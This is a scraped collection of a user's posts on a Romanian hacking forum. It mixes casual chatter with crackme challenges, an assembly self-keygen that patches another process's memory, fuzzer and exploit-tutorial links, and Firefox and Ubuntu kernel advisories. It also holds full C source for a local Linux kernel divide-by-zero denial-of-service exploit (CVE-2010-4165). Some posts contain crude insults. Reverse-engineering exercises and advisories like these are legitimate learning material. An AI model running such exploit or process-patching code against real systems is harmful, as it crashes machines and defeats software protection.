Flubber
-
Posts
1765 -
Joined
-
Last visited
-
Days Won
11
Posts posted by Flubber
-
-
1) de ce e asa de greu de crezut ca sunt fata? sunteti misogini ?
2) 699 vine de la cu totul altceva decat va asteptati voi
3) as prefera sa ma ajute cineva care nu e obsedat sexual
4) credeam ca e un forum serios , insa MAJORITATEA imi arata contrariul
5) Majoritatea celor care au postat aici dau dovada de proasta crestere avand in vedere ca eu nu am insultat pe nimeni
Sa ma pis pe tine.
Pazea ca vine si Pax!
-
Thanks!
Nu cumva era?
#!/usr/bin/env python3.2
# SMTP Dictionary Attack
# 21.03.[B]2011[/B] cmiN+rep
-
Download: http://www.exploit-db.com/download_pdf/17008I’ve started to write a series of tutorials about exploit development on Linux, this is the first part which contains a Stack overflow, with hardcoded ESP address (I know it’s unreliable, that’s why it’s part 1). -
Daaaaaaaaaaa, la multi ani! Daaaa, 8 martie! Sunt cel mai mare fan MILF..a.. doar fan! http://www.vh1.com/sitewide/flipbooks/img/shows/i_love_money_2/cast/milf_01.jpg ; servim: celulita 24/7 0231 6453 21 sau 0231 MILF 21
-
-
Daca s-ar afla algoritm-ul pentru conturi premium si s-ar face un generator, ar functiona? Doar daca nu ar verifica daca acel cookie este identic cu cel din baza de date? Usor de zis, greu de facut
-
-
NOKAS (este pe filelist, aia vorbesc in norvegiana dar ai subtitrarea in engleza inclusa in torrent, nu am vazut vreuna in romana, iar eu nu am putut face, cea in engleza a fost facuta cu un soft si este "encodata", nu am stat sa o fac manual dupa cum apare pe ecran; dar nu cred ca este o problema ca e in limba engleza)
-
pt virusz: de ce mi-ai sters postul cu keygenul de la primul crackme?
l-am pus acolo pt. ca cei care nu stiu cum sa-l rezolve sa vada cam cum ar trebui sa arate serialele. de aceea am inclus si codul sursa. sa stii ca nu-i inveti pe oameni nimic daca nu le si arati cum ai reusit sa ajungi la rezultatul ala. oricum muncisem la keygenul ala si nu mi-a cazut prea bine cand am vazut postul sters. si ca sa imi intaresc argumentele: chiar daca userii postau seriale precum ai cerut, tu nu aveai cum sa verifici validitatea lor, nestiind usernameul windowsului lor
te stimez pt timpul pe care-l dedici facand aceste crackme-uri
Din observatiile mele, s-a cam "dat inapoi" forumul (probabil s-a revenit la un backup anterior din diferite motive).
Am postat keygen-ul facut de tine in thread-ul corespunzator: http://rstcenter.com/forum/32359-crackme-vrs1.rst#post220177
Stima!
-
self keygen-ul lui sulea
Codul sursa ASM:
.386
.model flat,stdcall
option casemap:none
DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
EnumChildWindowx proto: DWORD, :DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
DlgName db "crackme",0
clasa db "TForm1",0
winn db "Crackme (vrs.1)",0
editul db "TEdit",0
AppName db "demonstratie selfkeygening",0
bytes_cc db 50h, 8Dh, 45h, 0C4h, 8bh, 00h, 89h, 05h, 0DCh, 3Eh, 47h, 00h, 58h, 0FFh, 75h, 0C4h, 68h, 0DCh, 43h, 45h, 00h
db 0E9h, 6fh, 04h, 0FEh, 0FFh
bytes_jump db 0E9h, 7Ah, 0FBh, 01h, 00h, 90h, 90h, 90h
totalul dd 26
totalul1 dd 26+100
totalul2 dd 8
offset_cc dd 473ef4h
offset_cc1 dd 473ef4h-50
offset_cc2 dd 454375h
adresaa dd 473edch
buffer1 db 4 dup(0)
buffer2 db 20 dup(0)
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 10 dup(?)
hform dd ?
oldaccess dd ?
hProcess dd ?
pid dd ?
bytes_written dd ?
adresaa2 dd ?
edit_handle dd ?
.const
IDC_BUTTON equ 3001
IDC_EXIT equ 3002
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
invoke ExitProcess,eax
DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_CLOSE
invoke SendMessage,hWnd,WM_COMMAND,IDC_EXIT,0
.elseif uMsg==WM_TIMER
Invoke ReadProcessMemory, hProcess, adresaa, addr buffer1, 4, NULL
lea eax,buffer1
mov eax,[eax]
push eax
pop adresaa2
add adresaa2,10h
Invoke ReadProcessMemory, hProcess, adresaa2, addr buffer2, 18, NULL
invoke SendMessage, edit_handle, WM_SETTEXT, 0, ADDR buffer2
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
mov edx,wParam
shr edx,16
.if dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke FindWindow,addr clasa,addr winn
mov hform, eax
.if hform != 0
invoke EnumChildWindows, hform, ADDR EnumChildWindowx, NULL
Invoke GetWindowThreadProcessId, hform, ADDR pid
Invoke OpenProcess,PROCESS_VM_READ + PROCESS_VM_WRITE + PROCESS_VM_OPERATION, 0, pid
mov hProcess,eax
Invoke VirtualProtectEx, hProcess, offset_cc1, totalul1, PAGE_EXECUTE_READWRITE, addr oldaccess
invoke WriteProcessMemory,hProcess,offset_cc, addr bytes_cc, totalul, addr bytes_written
Invoke VirtualProtectEx, hProcess, offset_cc2, totalul2, PAGE_EXECUTE_READWRITE, addr oldaccess
invoke WriteProcessMemory,hProcess,offset_cc2, addr bytes_jump, totalul2, addr bytes_written
invoke SetTimer,hWnd,1,1000,NULL
.endif
.ELSEIF ax==IDC_EXIT
invoke EndDialog, hWnd,NULL
.ENDIF
.ENDIF
.ELSE
mov eax,FALSE
ret
.ENDIF
mov eax,TRUE
ret
DlgProc endp
EnumChildWindowx proc hhWin:DWORD,lParam:DWORD
invoke GetClassName,hhWin,addr buffer,10
invoke lstrcmpi,addr buffer,addr editul
cmp eax,0
jne @F
push hhWin
pop edit_handle
@@: mov eax,1
ret
EnumChildWindowx endp
end start -
YouTube - Parerea barbatilor despre femei(Fragment din Decalogul dupa Hess)
Nu este intentionat ca o insulta, ci pur si simplu, din amuzament.
Tratati afirmatia anterioara ca si disclameir-urile unui tool ("nu sunt responsabil pentru ce faci cu aceasta unealta, eu il fac public oricum, ma doare-n biba").
Si nu, video-ul nu este facut de mine.
-
ATENTIE! O adaugare si o corectare, pentru a intelege toata lumea, nu am cerut special patch, in sensul plin al cuvantului (este bun si acesta), ci si executabilul original cu modificarile aduse (fie de ollydbg), unde la orice input, da mesajul de win.
Scuzele de rigoare daca v-am indus in eroare.
Nimic special, doar unul basic.
rdme.txt:
Bypass[01]
Nivel[usor]
Cunostinte necesare[asm - basic, debugger si debugging]
** Se cere:
***********
1] Bypass pentru a afisa mesajul corespunzator (patch -- .exe);
2] Indata ce punctul unu este indeplinit, se cere o explicatie (cum s-a ajuns la rezultat),
precum si explicarea (in mare) a codului ASM (ce actiuni importante s-au luat de catre CPU
pentru a ajunge la acel rezultat);
(optional) 3] Sa se afle user si parola.
! Parola de la fisierul "1.c" este cea de la crackme.
// Have phun.
Unde "!" se poate considera hint.Download: Download 1_crackme.zip from Sendspace.com - send big files the easy way
Incercati sa nu postati aici rezolvarea, eventual prin PM.
P.S.: M*ie aluia care face bruteforce pe *.c file pentru a afla rezolvarea.
Edit:
Primul care sparge gheata este daatdraqq. Felicitari!
Edit2:
Al doilea ce darama challenge-ul este sulea.
Edit3:
Al treilea ce darama challenge-ul este virusz.
1st. [B]daatdraqq[/B];
2nd. [B]sulea[/B];
3rd. [B]virusz[/B]; -
felicitari suport pentru proxy?
Intrucat, sickness si-a uitat parola de la cont (rofl), m-a rugat sa transmit aici mesajul sau, tie.
suportul proxy nu este necesar; un fuzzer doar trimite date unui program pe care il analizezi intr-un debugger -
Sunt multi frate , peste 1 miliard trebuie sa manance si aia ceva . Imi pare rau pt astia ce s-au uitat la video si au acasa cate un animal si au grija de el si tin la el ca la un adevarat prieten . Cate cazuri nu sunt in care cainele salveaza viata stapanului
Nu e vorba numai de asta, e vorba si de societate, e vorba despre inteligenta fiecarui individ, se spune ca atunci cand foamea iti ajunge la os si se resimte cel mai tare, omul isi uita toate 'naravurile' si activeaza singurele instincte de supravietuire, atunci nu te mai uiti ca-i pisica sau caine, dar chiar si asa, chiar si intr-o societate bolnava ce poate promoveaza asa ceva, direct sau indirect, nu te poate lasa constiinta in primul rand frate, sentimentul, gandul ca poti fi tu in locul aluia, chiar daca ti-e foame de iti vine sa mananci pamant, nu recurgi la asa ceva, da-te-n mortii ma-tii de chinez, ce om trebuie sa fi sa faci asa ceva? Cu siguranta psihopat!
-
Folosindu-se de Spike fuzzer, sickfuzz este un script developat de sickness in Python, pentru a testa diferite vulnerabilitati in aplicatii, trimitandu-le diferite date pe un port pana ce se iveste un crash (a.k.a. BoF); w/e.
Video: http://blip.tv/play/hdkFgqflYwA%2Em4v# What is fuzzing?
So in short fuzzing is a technique used to discover coding errors in software, so it sends the specific port,app,etc. unexpected data. For example if we have a small application that asks us for a number between 1 and 10 and then divides our number to 2, what will happen if we enter “%Io&6….” ? (It’s not the best example I know but I think you get the picture).
Download: Downloads - sickfuzz - Project Hosting on Google Code
Mai multe informatii aici: sickfuzz – HTTP fuzzer. ihasomgsecurityskills
-
Vina e a oamenilor de stiinta..pentru ca isi fac publice descoperirile.Ei stiu ca lucreaza in subordine si ca guvernul le studiaza fiecare miscare si gestioneaza banii pentru fiecare proiect.Inventiilor lor ajung mereu pe mana celor de sus.Oamenii de stiinta sunt ca si hackerii:geniali insa toti au gura sparta.(mda,faima si faptul ca ai realizat ceva nu are dreptul sa ti-o ia nimeni.)Cand descoperi ceva ce poate fute o intreaga planeta pur si simplu ar trebui sa taci de dragul stiintei,nu sa deschizi pliscul si sa speri ca o sa aiba demnitate si etica si sa nu se faca abuz de tehnologie.
Foarte bine spus, iar Einstein a realizat asta dupa ce a vazut efectele bombei atomice pe mana cui nu trebuia. Cei drept (din cunostintele mele), Einstein a furat planurile respective de la Nicola Tesla cu o saptamana in urma (vazandu-i schitele si notitele). Ei fiind parteneri strans legati, as putea spune o prostie, poate ma insel, dar asa cum a spus si wildchild, pe scurt "Don't give weapons to the crazy monkeys!"
Traiasca vinul rosu!
-
Remix in teh house:
-
^ subscriu.
Hint: Nu merge ollydbg, dar merge altceva (mai bun si cu mai mult gust -- asta depinde de fiecare) incepe cu "I" si se termina in "Pro". Pe langa asta, sulea si phantomas90 au spus destul. O groaza de hint-uri pentru skiddies.
-
Sunt incepator in domeniul, dar proxy-urile de tip elite/high anonymity? Din cate stiu eu nu lasa nicio urma. Ascund IP-ul tau si nici nu se dau de gol cum ca sunt proxy-uri (ca si cum serverul proxy este IP-ul tau original).
Cele la care te referi sunt SOCKS. Tutorial: http://rstcenter.com/forum/28323-despre-socks.rst
-
Asa ceva nu ajuta cu nimic, tot ce trebuie dat sunt indicii pentru newbies, rezolvarile directe nu te aduc nicaieri si nu inveti nimic din ele, eventual te consulti cu rezolvarile postate pe internet dupa ce ai rezolvat misiunea personal (asa inveti ceva nou, recapitulezi sau poate vezi tehnici noi). Crede-ma, am procedat la fel (in 40% din misiuni) si nu am invatat nimic (aproape).
-
Zero Day Initiative despre care am postat pe forum, dar aparent nu mai este thread-ul.
ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability
ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability
[URL="http://www.zerodayinitiative.com/advisories/ZDI-11-103"]Zero Day Initiative[/URL]
March 2, 2011
-- CVE ID:
CVE-2011-0055
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
Mozilla
-- Affected Products:
Mozilla Firefox
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10843.
For further product information on the TippingPoint IPS, visit:
[URL="http://www.tippingpoint.com/"]http://www.tippingpoint.com[/URL]
[B]
-- Vulnerability Details:[/B]
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Firefox. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.
The specific flaw exists within js3250.dll. In the JSON.stringify() call
chain js_HasOwnProperty() is called with an invalid pointer. The pointer
becomes invalid due to being unrooted and garbage collection occurring.
Dereferecing of this pointer allows a remote attacker to execute
arbitrary code in the context of the user running the browser.
-- Vendor Response:
Mozilla has issued an update to correct this vulnerability. More
details can be found at:
[URL="http://www.mozilla.org/security/announce/2011/mfsa2011-03.html"]MFSA 2011-03: Use-after-free error in JSON.stringify[/URL]
-- Disclosure Timeline:
2010-12-01 - Vulnerability reported to vendor
2011-03-02 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* regenrecht -
Felicitari! Multumiri!
:sadface:You must spread some Reputation around before giving it to tdxev again. -
Deja s-a facut upgrade-ul la 2.6.32-29. Cine are Ubuntu, update && upgrade.
[uSN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS)
Details follow:
Thomas Pollet discovered that the RDS network protocol did not check
certain iovec buffers. A local attacker could exploit this to crash the
system or possibly execute arbitrary code as the root user. (CVE-2010-3865)
Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did
not correctly clear kernel memory. A local attacker could exploit this to
read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)
Vasiliy Kulikov discovered that the Linux kernel sockets implementation did
not properly initialize certain structures. A local attacker could exploit
this to read kernel stack memory, leading to a loss of privacy.
(CVE-2010-3876)
Vasiliy Kulikov discovered that the TIPC interface did not correctly
initialize certain structures. A local attacker could exploit this to read
kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)
Nelson Elhage discovered that the Linux kernel IPv4 implementation did not
properly audit certain bytecodes in netlink messages. A local attacker
could exploit this to cause the kernel to hang, leading to a denial of
service. (CVE-2010-3880)
It was discovered that multithreaded exec did not handle CPU timers
correctly. A local attacker could exploit this to crash the system, leading
to a denial of service. (CVE-2010-4248)
Krishna Gudipati discovered that the bfa adapter driver did not correctly
initialize certain structures. A local attacker could read files in /sys to
crash the system, leading to a denial of service. (CVE-2010-4343)
Tavis Ormandy discovered that the install_special_mapping function could
bypass the mmap_min_addr restriction. A local attacker could exploit this
to mmap 4096 bytes below the mmap_min_addr area, possibly improving the
chances of performing NULL pointer dereference attacks. (CVE-2010-4346)
It was discovered that the ICMP stack did not correctly handle certain
unreachable messages. If a remote attacker were able to acquire a socket
lock, they could send specially crafted traffic that would crash the
system, leading to a denial of service. (CVE-2010-4526)
Dan Rosenberg discovered that the OSS subsystem did not handle name
termination correctly. A local attacker could exploit this crash the system
or gain root privileges. (CVE-2010-4527)
Dan Carpenter discovered that the Infiniband driver did not correctly
handle certain requests. A local user could exploit this to crash the
system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)[uSN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10)
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well.
Details follow:
It was discovered that KVM did not correctly initialize certain CPU
registers. A local attacker could exploit this to crash the system, leading
to a denial of service. (CVE-2010-3698)
Thomas Pollet discovered that the RDS network protocol did not check
certain iovec buffers. A local attacker could exploit this to crash the
system or possibly execute arbitrary code as the root user. (CVE-2010-3865)
Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did
not correctly clear kernel memory. A local attacker could exploit this to
read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)
Vasiliy Kulikov discovered that the Linux kernel sockets implementation did
not properly initialize certain structures. A local attacker could exploit
this to read kernel stack memory, leading to a loss of privacy.
(CVE-2010-3876)
Vasiliy Kulikov discovered that the TIPC interface did not correctly
initialize certain structures. A local attacker could exploit this to read
kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)
Nelson Elhage discovered that the Linux kernel IPv4 implementation did not
properly audit certain bytecodes in netlink messages. A local attacker
could exploit this to cause the kernel to hang, leading to a denial of
service. (CVE-2010-3880)
Dan Rosenberg discovered that the ivtv V4L driver did not correctly
initialize certian structures. A local attacker could exploit this to read
kernel stack memory, leading to a loss of privacy. (CVE-2010-4079)
Dan Rosenberg discovered that the semctl syscall did not correctly clear
kernel memory. A local attacker could exploit this to read kernel stack
memory, leading to a loss of privacy. (CVE-2010-4083)
It was discovered that multithreaded exec did not handle CPU timers
correctly. A local attacker could exploit this to crash the system, leading
to a denial of service. (CVE-2010-4248)
Nelson Elhage discovered that Econet did not correctly handle AUN packets
over UDP. A local attacker could send specially crafted traffic to crash
the system, leading to a denial of service. (CVE-2010-4342)
Tavis Ormandy discovered that the install_special_mapping function could
bypass the mmap_min_addr restriction. A local attacker could exploit this
to mmap 4096 bytes below the mmap_min_addr area, possibly improving the
chances of performing NULL pointer dereference attacks. (CVE-2010-4346)
Dan Rosenberg discovered that the OSS subsystem did not handle name
termination correctly. A local attacker could exploit this crash the system
or gain root privileges. (CVE-2010-4527)
Dan Carpenter discovered that the Infiniband driver did not correctly
handle certain requests. A local user could exploit this to crash the
system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)Cat despre Linux Kernel <= 2.6.37:
/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
* =======================================================
* A divide by 0 error occurs in tcp_select_initial_window
* when processing user supplied TCP_MAXSEG facilitating a
* local denial-of-service condition (kernel oops!) in all
* Linux Kernel 2.6.x branch (2.6.37 & below). This issue
* can be triggered easily with a call to setsockopt() on
* a listening network socket and then establishing a TCP
* connection to the awaiting socket.
*
* -- prdelka
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
int main() {
int optval, optlen, ret, sd, sd2, pid;
char *host = "localhost";
struct sockaddr_in locAddr;
struct sockaddr_in servAddr;
struct sockaddr_in dstAddr;
printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");
sd = socket(AF_INET, SOCK_STREAM, 0);
memset(&servAddr,0,sizeof(servAddr));
memset(&dstAddr,0,sizeof(dstAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(60000);
servAddr.sin_addr.s_addr = INADDR_ANY;
dstAddr.sin_family = AF_INET;
inet_aton("127.0.0.1", &dstAddr.sin_addr);
dstAddr.sin_port = htons(60000);
if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
printf("[ Cannot bind listener service\n");
exit(-1);
}
listen(sd,4);
optval = 12;
ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
if(ret==0)
{
printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
int sin_size = sizeof(struct sockaddr_in);
switch(pid = fork())
{
case 0:
sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
sleep(3);
default:
sd2 = socket(AF_INET, SOCK_STREAM, 0);
connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
sleep(3);
}
}
printf("[ System is patched, no dreams for this prince\n");
return 0;
}Surse (in ordine):
1] Full Disclosure: [uSN-1080-1] Linux kernel vulnerabilities
2] Full Disclosure: [uSN-1081-1] Linux kernel vulnerabilities
-
Pune mai intai unele mai simple...sau puteai sa scrii la hint: .NET.. macar un indiciu.
Ca l-am desfacut si nu avea nici o logica, nu gaseam input-uri, functiile nu semanau cu cele din win32.
Am vazut si rezolvarea, interesant.
Subscriu.
Deasemenea, la 6 dimineata imi storceam creierii si tot ce am putut scoate a fost:
CrackMe-rstcenter#PictureBox1.ImagePictureBox1Form2OStraduieste-te mai mult , pentru ca ...Form3Ai reusit !#CrackMe.Resou?rces
EAX=0B71B600
Stack SS:[0012E4C0]=01692678, (ASCII "îþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþEAX=0B71B600Niste notite idioate, dar am observat ceva si tot incercasem niste chestii aiurea:
CrackMe[B]-rstcenter[/B]
mai exact
-rstcenter
. Daca incepeam cu trial si error (daatdraq-rstcenter // gigiparleala-rstcenter etc) poate reuseam ceva.
Multumiri pentru crackme, cei drept, trebuia o analiza mai in detaliu a executabilului si poate imi dadeam seama ca a fost facut in .NET.
P.S.: Notitele au fost realizate in urma introducerii (bleah, suna aiurea) a executabilului in notepad (da, notepad ftw) si in hex editor -- a se vedea 'Form3 Ai reusit!', speram la un bypass catre Form3.
Interviu Bine Ati Venit
in Bine ai venit
Posted
Salut, încearc? s? nu te mai bâlbâi. Folose?te butonul "EDIT".